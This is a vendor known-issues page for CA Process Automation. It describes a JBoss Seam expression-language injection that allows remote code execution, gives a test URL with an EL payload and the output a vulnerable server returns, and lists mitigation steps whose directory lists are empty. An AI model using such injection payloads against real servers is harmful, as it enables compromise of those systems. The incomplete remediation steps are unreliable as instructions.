Previous Topic: Known IssuesNext Topic: "Field Set detected" Warning When Selecting Start Request Form

Release NotesKnown IssuesCA Process Automation Security Vulnerability

CA Process Automation Security Vulnerability

Symptom:

CA Process Automation contains a high-risk vulnerability that can allow a remote attacker to execute arbitrary code. The vulnerability occurs in the JBoss Seam component. An attacker can potentially execute arbitrary JBoss EL (Unified Expression Language extension) and fully compromise the server.

To test for this vulnerability, replace <HOST> with the hostname of the CA Process Automation installation in the following URL:

http://<HOST>:8080/admin-console/login.seam?actionOutcome=/test.xhtml%3ftested%3d%23{expressions.getClass().forName('java.lang.Runtime')}

This is the expected output if the JBoss EL command is successfully evaluated showing that the installation is vulnerable:

http://<HOST>:8080/admin-console/test.seam;jsessionid=0792523D29AE7A237D1CE5329C27A46F.?tested=class+java.lang.Runtime&conversationId=11

See the in-depth vulnerability details for further exploitation techniques.

Affected Products:

Unaffected Products:

Solution:

A fix is planned for a future release of CA Process Automation. In the meantime, use the following instructions to manually remove the vulnerable JBoss Seam component from the CA PAM installation. These instructions also disable the JBoss Admin Console.

  1. Stop the PAM service.
  2. Delete the contents of the following directories:
  3. Move the following folders from <PAM_Home>\server\c2o\deployers to a location outside the PAM directory tree to keep as a backup:
  4. Move the following folder from <PAM_Home>\server\c2o\ to a location outside the PAM directory tree to keep as a backup:
  5. Start the PAM service.

Note: If the Admin Console is needed temporarily, stop the PAM service, revert the changes in Step 4 above, and restart the PAM service. Repeat Step 4 when the Admin Console is no longer needed.